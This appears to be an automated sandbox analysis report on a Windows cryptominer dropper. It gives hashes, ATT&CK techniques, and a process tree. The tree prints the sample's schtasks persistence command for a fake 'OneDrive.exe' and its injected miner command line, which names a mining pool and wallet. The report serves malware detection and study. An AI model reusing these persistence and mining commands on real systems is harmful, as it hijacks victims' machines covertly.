67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128

Analysis

max time kernel
139s
max time network
123s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
08/01/2024, 04:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128.exe
Size

4.3MB
MD5

563f960105584f0430f32774d17a057f
SHA1

554fd82d279fe6e4a660c01ede00a9df3647da93
SHA256

67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128
SHA512

b500a8d51d5b0eef96063517850c191b3f8b99ed72c16342346868e328f1ca2fbff68a91d11ca74268951a21ba57b8e52d655a8ea88cd63bd173ddc8b0d83b3b
SSDEEP

98304:fOteFv2s5wfn7DGumus8G/Mul2rq/aReDkizMeQUp:fOtgv2Tfn/Gbug/Mul2rVe4iwVUp

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2736	OneDrive.exe
1964	OneDrive.exe

Loads dropped DLL 3 IoCs

pid	Process
2448	cmd.exe
2448	cmd.exe
1676	taskeng.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3012-25-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/3012-31-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/3012-29-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/3012-28-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/3012-26-0x0000000140000000-0x00000001407DC000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2736 set thread context of 3012	2736	OneDrive.exe	36

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2620	schtasks.exe
784	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2804	timeout.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2736	OneDrive.exe
1964	OneDrive.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2572	67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128.exe
Token: SeDebugPrivilege	2736	OneDrive.exe
Token: SeDebugPrivilege	1964	OneDrive.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 2572 wrote to memory of 2448	2572	67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128.exe	28
PID 2572 wrote to memory of 2448	2572	67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128.exe	28
PID 2572 wrote to memory of 2448	2572	67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128.exe	28
PID 2448 wrote to memory of 2804	2448	cmd.exe	30
PID 2448 wrote to memory of 2804	2448	cmd.exe	30
PID 2448 wrote to memory of 2804	2448	cmd.exe	30
PID 2448 wrote to memory of 2736	2448	cmd.exe	31
PID 2448 wrote to memory of 2736	2448	cmd.exe	31
PID 2448 wrote to memory of 2736	2448	cmd.exe	31
PID 2736 wrote to memory of 2884	2736	OneDrive.exe	34
PID 2736 wrote to memory of 2884	2736	OneDrive.exe	34
PID 2736 wrote to memory of 2884	2736	OneDrive.exe	34
PID 2884 wrote to memory of 2620	2884	cmd.exe	33
PID 2884 wrote to memory of 2620	2884	cmd.exe	33
PID 2884 wrote to memory of 2620	2884	cmd.exe	33
PID 2736 wrote to memory of 3012	2736	OneDrive.exe	36
PID 2736 wrote to memory of 3012	2736	OneDrive.exe	36
PID 2736 wrote to memory of 3012	2736	OneDrive.exe	36
PID 2736 wrote to memory of 3012	2736	OneDrive.exe	36
PID 2736 wrote to memory of 3012	2736	OneDrive.exe	36
PID 2736 wrote to memory of 3012	2736	OneDrive.exe	36
PID 2736 wrote to memory of 3012	2736	OneDrive.exe	36
PID 3012 wrote to memory of 2352	3012	vbc.exe	37
PID 3012 wrote to memory of 2352	3012	vbc.exe	37
PID 3012 wrote to memory of 2352	3012	vbc.exe	37
PID 1676 wrote to memory of 1964	1676	taskeng.exe	41
PID 1676 wrote to memory of 1964	1676	taskeng.exe	41
PID 1676 wrote to memory of 1964	1676	taskeng.exe	41
PID 1964 wrote to memory of 2932	1964	OneDrive.exe	45
PID 1964 wrote to memory of 2932	1964	OneDrive.exe	45
PID 1964 wrote to memory of 2932	1964	OneDrive.exe	45
PID 2932 wrote to memory of 784	2932	cmd.exe	42
PID 2932 wrote to memory of 784	2932	cmd.exe	42
PID 2932 wrote to memory of 784	2932	cmd.exe	42

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128.exe
"C:\Users\Admin\AppData\Local\Temp\67ecb32eb01382c71a0ccbb9668552aefc32893d92951bc17220c7056dad7128.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2572
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp39A6.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2448
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:2804
- - C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe
    "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2736
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2884
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3012
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3012 -s 164
        5⤵
        
        PID:2352

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
1⤵
- Creates scheduled task(s)
PID:2620

C:\Windows\system32\taskeng.exe
taskeng.exe {05119C67-9735-4009-934B-13858413BA95} S-1-5-21-2444714103-3190537498-3629098939-1000:DJLAPDMX\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1676
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe
  C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1964
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2932

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
1⤵
- Creates scheduled task(s)
PID:784

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe

Filesize
374KB

MD5
fecdb35d1f927e02730537888b4bab20

SHA1
33cced027c53437717433c89babf5a630fdc3182

SHA256
dfae49b17ecc68c21aababbb8b82b0e9f9b23560db68372d87e513858b54310d

SHA512
6f737c03c7d34fc1368ed4091653385b7d4a57a1d053a701cd0ff7565a3c0f9c9c4387c05f39141b36ac0b62c1c9086f263289a45bbef1e072c4893a338d10e5

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe

Filesize
405KB

MD5
6e4cb2024c638f8a91967eeeffa7d90c

SHA1
1b37d3b086d1630c54c09bec6e75032b7ad73171

SHA256
4a20e758eab92e65e3b508933806a7b339010b4b4bc7553845235a773cd3af9c

SHA512
98f357699a3151166ed8114a6c7eef304489fbcab12a8aa3a55d714c757ed5d17cc1a58083dad257f7e2361c8465da6a55801711e8ccb9a1ac5214683e53cd07

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe

Filesize
3.8MB

MD5
472cbff8d328f14addb8071fddc197d2

SHA1
dd8276564d2b5eb1eadbb09d2b2a835c63861f3a

SHA256
16dee10eeedafc3af9b23b4d6ace1af959ca5d1c3afb4e8ae91070804fa54434

SHA512
2140d947cb15d6fd06fce291ed6051f889496b57aae47280e7848189a84724960b027f17ecb43f41ebf9f6ecdc65f457666da82e9e0687d6b359915d0c09f7b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp39A6.tmp.bat

Filesize
176B

MD5
fed17c895fca25c6ec68613d4da702bb

SHA1
34725521e85e65595109a83b2c46a43c3b1b27b8

SHA256
cdddc5ecb43e0bd90dfac4b42442f3f72fc64ee4a48963b3cd091a950dfc282b

SHA512
81fb5ff77d9c8226462e164783e462e9a6f1696012661a9f9d9720c29293c87d8862dad59e186ba66c8de94efdedab0f501dee0719e68371ef99dd543f141678

Download Submit
\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe

Filesize
480KB

MD5
75a44fce9fabfc9854d220d0aa90792e

SHA1
38ef91565522b2bbf298f1f22c9d470495e98d26

SHA256
fed3bf824195c5dd7cb59b429bdf8b3929706b0890f4151b8659e085600465d4

SHA512
654d7ad5e9c2020c3e1f249d6afd62eb03cbb9b47e1cbea684ce35ef535380b9f1f66d7544ec72c6ae5bcafe9fb8f2e47d7616a5ac327860cf5277dd2fee47de

Download Submit
\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe

Filesize
365KB

MD5
0f4030d0732824948ad15b026e660642

SHA1
4b803bcf89ac49013aee1a45dd682ae0ff46a0aa

SHA256
4470e7e89b4bf1eaad32b2b63269f713bd9de432d216326a3bc7fc746755b01a

SHA512
2599318068ea8b671bb8903abffcd8cf70b42172b0abadf8a33c8e8a5c1cceb2d7d2096c9bf3aed7d9b9844812f032440abdc3dea257524f08a5f048f60dbf82

Download Submit
\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe

Filesize
3.2MB

MD5
114ae48010af4e4170e468750fa16ac3

SHA1
6a555a7745158a3ab3b0a8297d14730085403f38

SHA256
57c201677a60074b4be82c675dcbea9e4d1b0294ea3952b5b236ac0c563d7810

SHA512
7358ab650194fb519e3a6f27756a0b54933361081ef22c6a665c623076eec3541de91e977178f663857b00bdc95a6464b38beb0ee6799fd1c37b02df38369403

Download Submit
memory/1964-38-0x000007FEF5120000-0x000007FEF5B0C000-memory.dmp

Filesize
9.9MB

Download
memory/1964-37-0x000000001AE90000-0x000000001AF10000-memory.dmp

Filesize
512KB

Download
memory/1964-35-0x000000013F6E0000-0x000000013FD1E000-memory.dmp

Filesize
6.2MB

Download
memory/1964-34-0x000007FEF5120000-0x000007FEF5B0C000-memory.dmp

Filesize
9.9MB

Download
memory/2572-14-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmp

Filesize
9.9MB

Download
memory/2572-3-0x000000001ACC0000-0x000000001AD40000-memory.dmp

Filesize
512KB

Download
memory/2572-2-0x0000000000750000-0x0000000000751000-memory.dmp

Filesize
4KB

Download
memory/2572-0-0x000000013F090000-0x000000013F6CE000-memory.dmp

Filesize
6.2MB

Download
memory/2572-1-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmp

Filesize
9.9MB

Download
memory/2736-22-0x000000001B340000-0x000000001B3C0000-memory.dmp

Filesize
512KB

Download
memory/2736-30-0x000007FEF4B50000-0x000007FEF553C000-memory.dmp

Filesize
9.9MB

Download
memory/2736-20-0x000007FEF4B50000-0x000007FEF553C000-memory.dmp

Filesize
9.9MB

Download
memory/2736-19-0x000000013FFB0000-0x00000001405EE000-memory.dmp

Filesize
6.2MB

Download
memory/3012-31-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/3012-29-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/3012-28-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/3012-26-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/3012-27-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

Filesize
4KB

Download
memory/3012-25-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/3012-23-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download